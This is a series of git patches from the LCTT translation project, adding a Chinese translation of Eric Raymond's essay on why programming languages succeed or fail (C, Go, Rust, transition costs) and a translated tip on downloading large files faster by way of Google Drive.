-## 我们现在已经知道了两件十分中重要的紧急任务,要想取代 C 语言,首先要先做到这两点:(1)解决内存管理问题;(2)降低由 C 语言向本语言转化时所需的转入成本。纵观编程语言的历史——从人类行为学的角度来看,作为 C 语言的准替代者,如果不能有效解决转入成本过高这个问题,那他们所做的其他部分做得再好都不算数。相反的,如果他们把转入成本过高这个问题解决地很好,即使他们其他部分做的不是最好的,人们也不会对他们吹毛求疵。
-## 这正是 Go 的做法,但这个理论并不是完美无瑕的,它也有局限性。目前 GC 延迟限制了它的发展,但 Go 现在选择照搬 Unix 下 C 语言的传染战略,让自身语言变成易于转入,便于传播的语言,其繁殖速度甚至快于替代品。但从长远角度看,这并不是个好办法。
-## 当然, Rust 语言的不足是个十分明显的问题,我们不应当回避它。而它,正将自己定位为适用于长远计划的选择。在之前的部分中我已经谈到了为什么我觉得它还不完美,Rust 语言在 TIBOE 和PYPL 指数上的成就也证明了我的说法,在 TIBOE 上 Rust 从来没有进过前20名,在 PYPL 指数上它的成就也比 Go 差很多。
-## 五年后 Rust 能发展的怎样还是个问题,如果他们愿意改变,我建议他们重视转入成本问题。以我个人经历来说,由 C 语言转入 Rust 语言的能量壁垒使人望而却步。如果编码提升工具比如 Corrode 只能把 C 语言映射为不稳定的 Rust 语言,但不能解决能量壁垒的问题;或者如果有更简单的方法能够自动注释所有权或试用期,人们也不再需要它们了——这些问题编译器就能够解决。目前我不知道怎样解决这个问题,但我觉得他们最好找出解决方案。
-## 在最后我想强调一下,虽然在 Ken Thompson 的设计经历中,他看起来很少解决短期问题,但他对未来有着极大的包容性,并且这种包容性还在不断提升。当然 Unix 也是这样的, 它让我不禁暗自揣测,让我认为 Go 语言中令人不快的地方都其实是他们未来事业的基石(例如缺乏泛型)。如果要确认这件事是真假,我需要比 Ken 还要聪明,但这并不是一件容易让人相信的事情。
-
-
+ -最合理的语言工程模式
+ -============================================================
+ -
+ -当你熟练掌握一体化工程技术时,你就会发现它逐渐超过了技术优化的层面。我们制作的每件手工艺品都在一个大环境背景下,在这个环境中,人类的行为逐渐突破了经济意义,社会学意义,达到了奥地利经济学家所称的“人类行为学”,这是目的明确的人类行为所能达到的最大范围。
+ -
+ -对我来说这并不只是抽象理论。当我在开源发展项目中编写时,我的行为就十分符合人类行为学的理论,这行为不是针对任何特定的软件技术或某个客观事物,它指的是在开发科技的过程中人类行为的背景环境。从人类行为学角度对科技进行的解读不断增加,大量的这种解读可以重塑科技框架,带来人类生产力和满足感的极大幅度增长,而这并不是由于我们换了工具,而是在于我们改变了掌握它们的方式。
+ -
+ -在这个背景下,我在第三篇额外的文章中谈到了 C 语言的衰退和正在到来的巨大改变,而我们也确实能够感受到系统编程的新时代的到来,在这个时刻,我决定把我之前有的大体的预感具象化为更加具体的,更实用的点子,它们主要是关于计算机语言设计的分析,例如为什么他们会成功,或为什么他们会失败。
+ -
+ -在我最近的一篇文章中,我写道:所有计算机语言都是对机器资源的成本和程序员工作成本的相对权衡的结果,和对其相对价值的体现。这些都是在一个计算能力成本不断下降但程序员工作成本不减反增的背景下产生的。我还强调了转化成本在使原有交易主张适用于当下环境中的新增角色。在文中我将编程人员描述为一个寻找今后最适方案的探索者。
+ -
+ -现在我要讲一讲最后一点。以现有水平为起点,一个语言工程师有极大可能通过多种方式推动语言设计的发展。通过什么系统呢? GC 还是人工分配?使用何种配置,命令式语言,函数程式语言或是面向对象语言?但是从人类行为学的角度来说,我认为它的形式会更简洁,也许只是选择解决长期问题还是短期问题?
+ -
+ -所谓的“远”“近”之分,是指硬件成本的逐渐降低,软件复杂程度的上升和由现有语言向其他语言转化的成本的增加,根据它们的变化曲线所做出的判断。短期问题指编程人员眼下发现的问题,长期问题指可预见的一系列情况,但它们一段时间内不会到来。针对近期问题所做出的部署需要非常及时且有效,但随着情况的变化,短期解决方案有可能很快就不适用了。而长期的解决方案可能因其过于超前而夭折,或因其代价过高无法被接受。
+ -
+ -在计算机刚刚面世的时候, FORTRAN 是近期亟待解决的问题, LISP 是远期问题。汇编语言是短期解决方案,图解说明非通用语言的分类应用,还有关门电阻不断上涨的成本。随着计算机技术的发展,PHP 和 Javascript逐渐应用于游戏中。至于长期的解决方案? Oberon , Ocaml , ML , XML-Docbook 都可以。 他们形成的激励机制带来了大量具有突破性和原创性的想法,事态蓬勃但未形成体系,那个时候距离专业语言的面世还很远,(值得注意的是这些想法的出现都是人类行为学中的因果,并非由于某种技术)。专业语言会失败,这是显而易见的,它的转入成本高昂,让大部分人望而却步,因此不能没能达到能够让主流群体接受的水平,被孤立,被搁置。这也是 LISP 不为人知的的过去,作为前 LISP 管理层人员,出于对它深深的爱,我为你们讲述了这段历史。
+ -
+ -如果短期解决方案出现故障,它的后果更加惨不忍睹,最好的结果是期待一个相对体面的失败,好转换到另一个设计方案。(通常在转化成本较高时)如果他们执意继续,通常造成众多方案相互之间藕断丝连,形成一个不断扩张的复合体,一直维持到不能运转下去,变成一堆摇摇欲坠的杂物。是的,我说的就是 C++ 语言,还有 Java 描述语言,(唉)还有 Perl,虽然 Larry Wall 的好品味成功地让他维持了很多年,问题一直没有爆发,但在 Perl 6 发行时,他的好品味最终引爆了整个问题。
+ -
+ -这种思考角度激励了编程人员向着两个不同的目的重新塑造语言设计: ①以远近为轴,在自身和预计的未来之间选取一个最适点,然后 ②降低由一种或多种语言转化为自身语言的转入成本,这样你就可以吸纳他们的用户群。接下来我会讲讲 C 语言是怎样占领全世界的。
+ -
+ -在整个计算机发展史中,没有谁能比 C 语言完美地把握最适点的选取了,我要做的只是证明这一点,作为一种实用的主流语言, C 语言有着更长的寿命,它目睹了无数个竞争者的兴衰,但它的地位仍旧不可取代。从淘汰它的第一个竞争者到现在已经过了 35 年,但看起来C语言的终结仍旧不会到来。
+ -
+ -当然,如果你愿意的话,可以把 C 语言的持久存在归功于人类的文化惰性,但那是对“文化惰性”这个词的曲解, C 语言一直得以延续的真正原因是没有人提供足够的转化费用!
+ -
+ -相反的, C 语言低廉的内部转化费用未得到应有的重视,C 语言是如此的千变万化,从它漫长统治时期的初期开始,它就可以适用于多种语言如 FORTRAN , Pascal , 汇编语言和 LISP 的编程习惯。在二十世纪八十年代我就注意到,我可以根据编程人员的编码风格判断出他的母语是什么,这也从另一方面证明了C 语言的魅力能够吸引全世界的人使用它。
+ -
+ -C++ 语言同样胜在它低廉的转化费用。很快,大部分新兴的语言为了降低自身转化费用,纷纷参考 C 语言语法。请注意这给未来的语言设计环境带来了什么影响:它尽可能地提高了 C-like 语言的价值,以此来降低其他语言转化为 C 语言的转化成本。
+ -
+ -另一种降低转入成本的方法十分简单,即使没接触过编程的人都能学会,但这种方法很难完成。我认为唯一使用了这种方法的 Python就是靠这种方法进入了职业比赛。对这个方法我一带而过,是因为它并不是我希望看到的,顺利执行的系统语言战略,虽然我很希望它不是那样的。
+ -
+ -今天我们在2017年年底聚集在这里,下一项我们应该为某些暴躁的团体发声,如 Go 团队,但事实并非如此。 Go 这个项目漏洞百出,我甚至可以想象出它失败的各种可能,Go 团队太过固执独断,即使几乎整个用户群体都认为 Go 需要做出改变了,Go 团队也无动于衷,这是个大问题。 一旦发生故障, GC 发生延迟或者用牺牲生产量来弥补延迟,但无论如何,它都会严重影响到这种语言的应用,大幅缩小这种语言的适用范围。
+ -
+ -即便如此,在 Go 的设计中,还是有一个我颇为认同的远大战略目标,想要理解这个目标,我们需要回想一下如果想要取代 C 语言,要面临的短期问题是什么。同我之前提到的,随着项目计划的不断扩张,故障率也在持续上升,这其中内存管理方面的故障尤其多,而内存管理一直是崩溃漏洞和安全漏洞的高发领域。
+ -
+ -我们现在已经知道了两件十分中重要的紧急任务,要想取代 C 语言,首先要先做到这两点:(1)解决内存管理问题;(2)降低由 C 语言向本语言转化时所需的转入成本。纵观编程语言的历史——从人类行为学的角度来看,作为 C 语言的准替代者,如果不能有效解决转入成本过高这个问题,那他们所做的其他部分做得再好都不算数。相反的,如果他们把转入成本过高这个问题解决地很好,即使他们其他部分做的不是最好的,人们也不会对他们吹毛求疵。
+ -
+ -这正是 Go 的做法,但这个理论并不是完美无瑕的,它也有局限性。目前 GC 延迟限制了它的发展,但 Go 现在选择照搬 Unix 下 C 语言的传染战略,让自身语言变成易于转入,便于传播的语言,其繁殖速度甚至快于替代品。但从长远角度看,这并不是个好办法。
+ -
+ -当然, Rust 语言的不足是个十分明显的问题,我们不应当回避它。而它,正将自己定位为适用于长远计划的选择。在之前的部分中我已经谈到了为什么我觉得它还不完美,Rust 语言在 TIBOE 和PYPL 指数上的成就也证明了我的说法,在 TIBOE 上 Rust 从来没有进过前20名,在 PYPL 指数上它的成就也比 Go 差很多。
+ -
+ -五年后 Rust 能发展的怎样还是个问题,如果他们愿意改变,我建议他们重视转入成本问题。以我个人经历来说,由 C 语言转入 Rust 语言的能量壁垒使人望而却步。如果编码提升工具比如 Corrode 只能把 C 语言映射为不稳定的 Rust 语言,但不能解决能量壁垒的问题;或者如果有更简单的方法能够自动注释所有权或试用期,人们也不再需要它们了——这些问题编译器就能够解决。目前我不知道怎样解决这个问题,但我觉得他们最好找出解决方案。
+ -
+ -在最后我想强调一下,虽然在 Ken Thompson 的设计经历中,他看起来很少解决短期问题,但他对未来有着极大的包容性,并且这种包容性还在不断提升。当然 Unix 也是这样的, 它让我不禁暗自揣测,让我认为 Go 语言中令人不快的地方都其实是他们未来事业的基石(例如缺乏泛型)。如果要确认这件事是真假,我需要比 Ken 还要聪明,但这并不是一件容易让人相信的事情。
+ -
+ ---------------------------------------------------------------------------------
+ -
+ -via: http://esr.ibiblio.org/?p=7745
+ -
+ -作者:[Eric Raymond ][a]
+ -译者:[Valoniakim](https://github.com/Valoniakim)
+ -校对:[校对者ID](https://github.com/校对者ID)
+ -
+ -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+ -
+ -[a]:http://esr.ibiblio.org/?author=2
+ -[1]:http://esr.ibiblio.org/?author=2
+ -[2]:http://esr.ibiblio.org/?p=7711&cpage=1#comment-1913931
+ -[3]:http://esr.ibiblio.org/?p=7745
From 1f9edc7325ab04fc87a6c4b35aff1fa5dbe90e24 Mon Sep 17 00:00:00 2001
From: Valonia Kim <34000495+Valoniakim@users.noreply.github.com>
Date: Mon, 4 Dec 2017 20:40:38 +0800
Subject: [PATCH 005/371] Rename Language engineering for great justice. to
20171118 Language engineering for great justice.
---
... justice. => 20171118 Language engineering for great justice.} | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename translated/tech/{Language engineering for great justice. => 20171118 Language engineering for great justice.} (100%)
diff --git a/translated/tech/Language engineering for great justice. b/translated/tech/20171118 Language engineering for great justice.
similarity index 100%
rename from translated/tech/Language engineering for great justice.
rename to translated/tech/20171118 Language engineering for great justice.
From 7683f19b3eea039fe0de6dbe3342af78f30a4bed Mon Sep 17 00:00:00 2001
From: Valonia Kim <34000495+Valoniakim@users.noreply.github.com>
Date: Tue, 5 Dec 2017 13:01:06 +0800
Subject: [PATCH 006/371] Delete Language engineering for great justice
---
.../Language engineering for great justice | 24 -------------------
1 file changed, 24 deletions(-)
delete mode 100644 translated/tech/Language engineering for great justice
diff --git a/translated/tech/Language engineering for great justice b/translated/tech/Language engineering for great justice
deleted file mode 100644
index d26f9319bd..0000000000
--- a/translated/tech/Language engineering for great justice
+++ /dev/null
@@ -1,24 +0,0 @@
-最合理的语言工程模式
-当你熟练掌握一体化工程技术时,你就会发现它逐渐超过了技术优化的层面。我们制作的每件手工艺品都在一个大环境背景下,在这个环境中,人类的行为逐渐突破了经济意义,社会学意义,达到了奥地利经济学家所称的“人类行为学”,这是目的明确的人类行为所能达到的最大范围。
-对我来说这并不只是抽象理论。当我在开源发展项目中编写时,我的行为就十分符合人类行为学的理论,这行为不是针对任何特定的软件技术或某个客观事物,它指的是在开发科技的过程中人类行为的背景环境。从人类行为学角度对科技进行的解读不断增加,大量的这种解读可以重塑科技框架,带来人类生产力和满足感的极大幅度增长,而这并不是由于我们换了工具,而是在于我们改变了掌握它们的方式。
-在这个背景下,我在第三篇额外的文章中谈到了 C 语言的衰退和正在到来的巨大改变,而我们也确实能够感受到系统编程的新时代的到来,在这个时刻,我决定把我之前有的大体的预感具象化为更加具体的,更实用的点子,它们主要是关于计算机语言设计的分析,例如为什么他们会成功,或为什么他们会失败。
-在我最近的一篇文章中,我写道:所有计算机语言都是对机器资源的成本和程序员工作成本的相对权衡的结果,和对其相对价值的体现。这些都是在一个计算能力成本不断下降但程序员工作成本不减反增的背景下产生的。我还强调了转化成本在使原有交易主张适用于当下环境中的新增角色。在文中我将编程人员描述为一个寻找今后最适方案的探索者。
-现在我要讲一讲最后一点。以现有水平为起点,一个语言工程师有极大可能通过多种方式推动语言设计的发展。通过什么系统呢? GC 还是人工分配?使用何种配置,命令式语言,函数程式语言或是面向对象语言?但是从人类行为学的角度来说,我认为它的形式会更简洁,也许只是选择解决长期问题还是短期问题?
-所谓的“远”“近”之分,是指硬件成本的逐渐降低,软件复杂程度的上升和由现有语言向其他语言转化的成本的增加,根据它们的变化曲线所做出的判断。短期问题指编程人员眼下发现的问题,长期问题指可预见的一系列情况,但它们一段时间内不会到来。针对近期问题所做出的部署需要非常及时且有效,但随着情况的变化,短期解决方案有可能很快就不适用了。而长期的解决方案可能因其过于超前而夭折,或因其代价过高无法被接受。
-在计算机刚刚面世的时候, FORTRAN 是近期亟待解决的问题, LISP 是远期问题。汇编语言是短期解决方案,图解说明非通用语言的分类应用,还有关门电阻不断上涨的成本。随着计算机技术的发展,PHP 和 Javascript逐渐应用于游戏中。至于长期的解决方案? Oberon , Ocaml , ML , XML-Docbook 都可以。 他们形成的激励机制带来了大量具有突破性和原创性的想法,事态蓬勃但未形成体系,那个时候距离专业语言的面世还很远,(值得注意的是这些想法的出现都是人类行为学中的因果,并非由于某种技术)。专业语言会失败,这是显而易见的,它的转入成本高昂,让大部分人望而却步,因此不能没能达到能够让主流群体接受的水平,被孤立,被搁置。这也是 LISP 不为人知的的过去,作为前 LISP 管理层人员,出于对它深深的爱,我为你们讲述了这段历史。
-如果短期解决方案出现故障,它的后果更加惨不忍睹,最好的结果是期待一个相对体面的失败,好转换到另一个设计方案。(通常在转化成本较高时)如果他们执意继续,通常造成众多方案相互之间藕断丝连,形成一个不断扩张的复合体,一直维持到不能运转下去,变成一堆摇摇欲坠的杂物。是的,我说的就是 C++ 语言,还有 Java 描述语言,(唉)还有 Perl,虽然 Larry Wall 的好品味成功地让他维持了很多年,问题一直没有爆发,但在 Perl 6 发行时,他的好品味最终引爆了整个问题。
-这种思考角度激励了编程人员向着两个不同的目的重新塑造语言设计: ①以远近为轴,在自身和预计的未来之间选取一个最适点,然后 ②降低由一种或多种语言转化为自身语言的转入成本,这样你就可以吸纳他们的用户群。接下来我会讲讲 C 语言是怎样占领全世界的。
-在整个计算机发展史中,没有谁能比 C 语言完美地把握最适点的选取了,我要做的只是证明这一点,作为一种实用的主流语言, C 语言有着更长的寿命,它目睹了无数个竞争者的兴衰,但它的地位仍旧不可取代。从淘汰它的第一个竞争者到现在已经过了 35 年,但看起来C语言的终结仍旧不会到来。
-当然,如果你愿意的话,可以把 C 语言的持久存在归功于人类的文化惰性,但那是对“文化惰性”这个词的曲解, C 语言一直得以延续的真正原因是没有人提供足够的转化费用!
-相反的, C 语言低廉的内部转化费用未得到应有的重视,C 语言是如此的千变万化,从它漫长统治时期的初期开始,它就可以适用于多种语言如 FORTRAN , Pascal , 汇编语言和 LISP 的编程习惯。在二十世纪八十年代我就注意到,我可以根据编程人员的编码风格判断出他的母语是什么,这也从另一方面证明了C 语言的魅力能够吸引全世界的人使用它。
-C++ 语言同样胜在它低廉的转化费用。很快,大部分新兴的语言为了降低自身转化费用,纷纷参考 C 语言语法。请注意这给未来的语言设计环境带来了什么影响:它尽可能地提高了 C-like 语言的价值,以此来降低其他语言转化为 C 语言的转化成本。
-另一种降低转入成本的方法十分简单,即使没接触过编程的人都能学会,但这种方法很难完成。我认为唯一使用了这种方法的 Python就是靠这种方法进入了职业比赛。对这个方法我一带而过,是因为它并不是我希望看到的,顺利执行的系统语言战略,虽然我很希望它不是那样的。
-今天我们在2017年年底聚集在这里,下一项我们应该为某些暴躁的团体发声,如 Go 团队,但事实并非如此。 Go 这个项目漏洞百出,我甚至可以想象出它失败的各种可能,Go 团队太过固执独断,即使几乎整个用户群体都认为 Go 需要做出改变了,Go 团队也无动于衷,这是个大问题。 一旦发生故障, GC 发生延迟或者用牺牲生产量来弥补延迟,但无论如何,它都会严重影响到这种语言的应用,大幅缩小这种语言的适用范围。
-即便如此,在 Go 的设计中,还是有一个我颇为认同的远大战略目标,想要理解这个目标,我们需要回想一下如果想要取代 C 语言,要面临的短期问题是什么。同我之前提到的,随着项目计划的不断扩张,故障率也在持续上升,这其中内存管理方面的故障尤其多,而内存管理一直是崩溃漏洞和安全漏洞的高发领域。
-我们现在已经知道了两件十分中重要的紧急任务,要想取代 C 语言,首先要先做到这两点:(1)解决内存管理问题;(2)降低由 C 语言向本语言转化时所需的转入成本。纵观编程语言的历史——从人类行为学的角度来看,作为 C 语言的准替代者,如果不能有效解决转入成本过高这个问题,那他们所做的其他部分做得再好都不算数。相反的,如果他们把转入成本过高这个问题解决地很好,即使他们其他部分做的不是最好的,人们也不会对他们吹毛求疵。
-这正是 Go 的做法,但这个理论并不是完美无瑕的,它也有局限性。目前 GC 延迟限制了它的发展,但 Go 现在选择照搬 Unix 下 C 语言的传染战略,让自身语言变成易于转入,便于传播的语言,其繁殖速度甚至快于替代品。但从长远角度看,这并不是个好办法。
-当然, Rust 语言的不足是个十分明显的问题,我们不应当回避它。而它,正将自己定位为适用于长远计划的选择。在之前的部分中我已经谈到了为什么我觉得它还不完美,Rust 语言在 TIBOE 和PYPL 指数上的成就也证明了我的说法,在 TIBOE 上 Rust 从来没有进过前20名,在 PYPL 指数上它的成就也比 Go 差很多。
-五年后 Rust 能发展的怎样还是个问题,如果他们愿意改变,我建议他们重视转入成本问题。以我个人经历来说,由 C 语言转入 Rust 语言的能量壁垒使人望而却步。如果编码提升工具比如 Corrode 只能把 C 语言映射为不稳定的 Rust 语言,但不能解决能量壁垒的问题;或者如果有更简单的方法能够自动注释所有权或试用期,人们也不再需要它们了——这些问题编译器就能够解决。目前我不知道怎样解决这个问题,但我觉得他们最好找出解决方案。
-在最后我想强调一下,虽然在 Ken Thompson 的设计经历中,他看起来很少解决短期问题,但他对未来有着极大的包容性,并且这种包容性还在不断提升。当然 Unix 也是这样的, 它让我不禁暗自揣测,让我认为 Go 语言中令人不快的地方都其实是他们未来事业的基石(例如缺乏泛型)。如果要确认这件事是真假,我需要比 Ken 还要聪明,但这并不是一件容易让人相信的事情。
-
-
From d397c99a0c13a049a22b03bd4ca69c66408d246a Mon Sep 17 00:00:00 2001
From: Valonia Kim <34000495+Valoniakim@users.noreply.github.com>
Date: Tue, 5 Dec 2017 13:13:33 +0800
Subject: [PATCH 007/371] Translated
---
...ustice. => 20171118 Language engineering for great justice.md} | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename translated/tech/{20171118 Language engineering for great justice. => 20171118 Language engineering for great justice.md} (100%)
diff --git a/translated/tech/20171118 Language engineering for great justice. b/translated/tech/20171118 Language engineering for great justice.md
similarity index 100%
rename from translated/tech/20171118 Language engineering for great justice.
rename to translated/tech/20171118 Language engineering for great justice.md
From 171aa2209067b6db25c236e6d59022b59e9f0ae5 Mon Sep 17 00:00:00 2001
From: Shucheng <741932183@qq.com>
Date: Mon, 1 Jan 2018 23:12:29 +0800
Subject: [PATCH 008/371] translated
---
...ogle Drive And Download 10 Times Faster.md | 79 -------------------
...ogle Drive And Download 10 Times Faster.md | 49 ++++++++++++
2 files changed, 49 insertions(+), 79 deletions(-)
delete mode 100644 sources/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
create mode 100644 translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
diff --git a/sources/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md b/sources/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
deleted file mode 100644
index 164832ef3e..0000000000
--- a/sources/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
+++ /dev/null
@@ -1,79 +0,0 @@
-Drshu Translating
-Save Files Directly To Google Drive And Download 10 Times Faster
-======
-
-![][image-1]
-
-So recently I had to download the update package for my phone but when I started downloading it, I found it was too big in size. Approximately 1.5 GigaByte.
-
-[![downloading miui update from chorme][image-2]][1]
-
-Considering the download speed it would have taken me at least 1 - 1.5 hour to download that file and honestly, I didn't have much time. Now my download speed may be slow but my ISP has Google Peering. Which means that I get incredible speeds on All Google products like Google Drive, Youtube, and PlayStore.
-
-So I found a web-service called [savetodrive][2]. This website can save files from the web directly to your Google Drive folder. And then you can download it from your google drive which will be much faster.
-
-So let's see how to do it.
-
-### **Step 1**
-
-Get the Download URL of the file. Copy it to your clipboard.
-
-### **Step 2**
-
-Head over to [savetodrive][3] and click on Authenticate.
-
-[![savetodrive to save files to cloud drive][image-3]][4]
-
-This will ask for your permissions to use google drive. Click on Allow.
-
-[![http://www.zdnet.com/article/linux-totally-dominates-supercomputers/][image-4]][5]
-
-### **Step 3**
-
-You will see the following page again. Just enter the download link in the url box and click on Upload.
-
-[![savetodrive download file directly to cloud][image-5]][6]
-
-You will start seeing upload progress bar. You can see that the upload speed is 48 MBps, So it will upload my 1.5 GB file in about 30-35 seconds. Once that is done, head over to your Google Drive and you will see the uploaded file.
-
-[![google drive savetodrive][image-6]][7]
-
-So the file that begins with **miui** is my file that I just uploaded. Now I can download it at great speed.
-
-[![how to download miui update from browser][image-7]][8]
-
-Now you can see my download speed is around 5 Mbps so I will download the that file in 5-6 minutes.
-
-So that was it guys. I always download my files like this. The service is completely free of charge and totally amazing.
-
-----
-
-via: http://www.theitstuff.com/save-files-directly-google-drive-download-10-times-faster
-
-作者:[Rishabh Kandari][9]
-译者:[译者ID][10]
-校对:[校对者ID][11]
-
-本文由 [LCTT][12] 原创编译,[Linux中国][13] 荣誉推出
-
-[1]: http://www.theitstuff.com/wp-content/uploads/2017/10/1-2-e1508771706462.png
-[2]: https://savetodrive.net/
-[3]: http://www.savetodrive.net
-[4]: http://www.theitstuff.com/wp-content/uploads/2017/10/3-1.png
-[5]: http://www.theitstuff.com/wp-content/uploads/2017/10/authenticate-google-account.jpg
-[6]: http://www.theitstuff.com/wp-content/uploads/2017/10/6-2.png
-[7]: http://www.theitstuff.com/wp-content/uploads/2017/10/7-2-e1508772046583.png
-[8]: http://www.theitstuff.com/wp-content/uploads/2017/10/8-e1508772110385.png
-[9]: http://www.theitstuff.com/author/reevkandari
-[10]: https://github.com/%E8%AF%91%E8%80%85ID
-[11]: https://github.com/%E6%A0%A1%E5%AF%B9%E8%80%85ID
-[12]: https://github.com/LCTT/TranslateProject
-[13]: https://linux.cn/
-
-[image-1]: http://www.theitstuff.com/wp-content/uploads/2017/11/Save-Files-Directly-To-Google-Drive-And-Download-10-Times-Faster.jpg
-[image-2]: http://www.theitstuff.com/wp-content/uploads/2017/10/1-2-e1508771706462.png
-[image-3]: http://www.theitstuff.com/wp-content/uploads/2017/10/3-1.png
-[image-4]: http://www.theitstuff.com/wp-content/uploads/2017/10/authenticate-google-account.jpg
-[image-5]: http://www.theitstuff.com/wp-content/uploads/2017/10/6-2.png
-[image-6]: http://www.theitstuff.com/wp-content/uploads/2017/10/7-2-e1508772046583.png
-[image-7]: http://www.theitstuff.com/wp-content/uploads/2017/10/8-e1508772110385.png
\ No newline at end of file
diff --git a/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md b/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
new file mode 100644
index 0000000000..bf28c77328
--- /dev/null
+++ b/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
@@ -0,0 +1,49 @@
+
+# 直接保存文件至 Google Drive 并用十倍的速度下载回来
+最近我不得不给我的手机下载更新包,但是当我开始下载的时候,我发现安装包过于庞大。大约有 1.5 GB
+
+[downloading miui update from chorme](http://www.theitstuff.com/wp-content/uploads/2017/10/1-2-e1508771706462.png)
+
+考虑到这个下载速度至少需要花费 1 至 1.5 小时来下载,并且说实话我并没有这么多时间。现在我下载速度可能会很慢,但是我的 ISP 有 Google Peering (Google 对等操作)。这意味着我可以在所有的 Google 产品,例如Google Drive, YouTube 和 PlayStore 中获得一个惊人的速度。
+
+所以我找到一个网络服务叫做[savetodrive](https://savetodrive.net/)。这个网站可以从网页上直接保存文件到你的 Google Drive 文件夹之中。之后你就可以从你的 Google Drive 上面下载它,这样的下载速度会快很多。
+
+现在让我们来看看如何操作。
+
+### *第一步*
+获得文件的下载链接,将它复制到你的剪贴板。
+
+### *第二步*
+前往链接[savetodrive](http://www.savetodrive.net) 并且点击相应位置以验证身份。
+
+[savetodrive to save files to cloud drive](http://www.theitstuff.com/wp-content/uploads/2017/10/3-1.png)
+
+这将会请求获得使用你 Google Drive 的权限,点击 “Allow”
+
+[http://www.zdnet.com/article/linux-totally-dominates-supercomputers/](http://www.theitstuff.com/wp-content/uploads/2017/10/authenticate-google-account.jpg)
+
+### *第三步*
+你将会再一次看到下面的页面,此时仅仅需要输入下载链接在链接框中,并且点击 “Upload”
+
+[savetodrive download file directly to cloud](http://www.theitstuff.com/wp-content/uploads/2017/10/6-2.png)
+
+你将会开始看到上传进度条,可以看到上传速度达到了 48 Mbps,所以上传我这个 1.5 GB 的文件需要 30 至 35 秒。一旦这里完成了,进入你的 Google Drive 你就可以看到刚才上传的文件。
+
+[google drive savetodrive](http://www.theitstuff.com/wp-content/uploads/2017/10/7-2-e1508772046583.png)
+
+这里的文件中,文件名开头是 *miui* 的就是我刚才上传的,现在我可以用一个很快的速度下载下来。
+
+[how to download miui update from browser](http://www.theitstuff.com/wp-content/uploads/2017/10/8-e1508772110385.png)
+
+可以看到我的下载速度大概是 5 Mbps ,所以我下载这个文件只需要 5 到 6 分钟。
+
+所以就是这样的,我经常用这样的方法下载文件,最令人惊讶的是,这个服务是完全免费的。
+---
+
+via: http://www.theitstuff.com/save-files-directly-google-drive-download-10-times-faster
+
+作者:[Rishabh Kandari](http://www.theitstuff.com/author/reevkandari)
+译者:[Drshu]
+校对:[校对者ID]((null))
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From 90035543920a3db21d9429e09b8d613ea03b99a1 Mon Sep 17 00:00:00 2001
From: datastruct
Date: Fri, 5 Jan 2018 15:33:42 +0800
Subject: [PATCH 009/371] Update 20171228 Linux wc Command Explained for
Beginners (6 Examples).md
---
...1228 Linux wc Command Explained for Beginners (6 Examples).md | 1 +
1 file changed, 1 insertion(+)
diff --git a/sources/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md b/sources/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md
index 7b4143473f..b6088797f9 100644
--- a/sources/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md
+++ b/sources/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md
@@ -1,3 +1,4 @@
+translating by stevenzdg988
Linux wc Command Explained for Beginners (6 Examples)
======
From 4ccce4496983ef27ecf2c0d56313bbb4eccc9313 Mon Sep 17 00:00:00 2001
From: datastruct
Date: Fri, 5 Jan 2018 15:34:01 +0800
Subject: [PATCH 010/371] Update 20171228 Linux wc Command Explained for
Beginners (6 Examples).md
---
...1228 Linux wc Command Explained for Beginners (6 Examples).md | 1 +
1 file changed, 1 insertion(+)
diff --git a/sources/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md b/sources/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md
index b6088797f9..2d46a74207 100644
--- a/sources/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md
+++ b/sources/tech/20171228 Linux wc Command Explained for Beginners (6 Examples).md
@@ -1,4 +1,5 @@
translating by stevenzdg988
+
Linux wc Command Explained for Beginners (6 Examples)
======
From 47406977516f475a82652a0487f37931fe6c5ea1 Mon Sep 17 00:00:00 2001
From: stevenzdg988
Date: Fri, 5 Jan 2018 19:51:50 +0800
Subject: [PATCH 011/371] translating by stevenzdg988
---
sources/tech/20171031 Migrating to Linux- An Introduction.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20171031 Migrating to Linux- An Introduction.md b/sources/tech/20171031 Migrating to Linux- An Introduction.md
index 2dcc13f0f6..513a8cd721 100644
--- a/sources/tech/20171031 Migrating to Linux- An Introduction.md
+++ b/sources/tech/20171031 Migrating to Linux- An Introduction.md
@@ -1,3 +1,5 @@
+stevenzdg988 translating!!
+
Migrating to Linux: An Introduction
======
![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/migrating-to-linux.jpg?itok=sjcGK0SY)
From ecb57ced6ad0fe518bb6fdbd57df59c4d1a5c81b Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 21:22:56 +0800
Subject: [PATCH 012/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Make=20=E2=80=9Cr?=
=?UTF-8?q?m=E2=80=9D=20Command=20To=20Move=20The=20Files=20To=20=E2=80=9C?=
=?UTF-8?q?Trash=20Can=E2=80=9D=20Instead=20Of=20Removing=20Them=20Complet?=
=?UTF-8?q?ely?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...an- Instead Of Removing Them Completely.md | 113 ++++++++++++++++++
1 file changed, 113 insertions(+)
create mode 100644 sources/tech/20171016 Make -rm- Command To Move The Files To -Trash Can- Instead Of Removing Them Completely.md
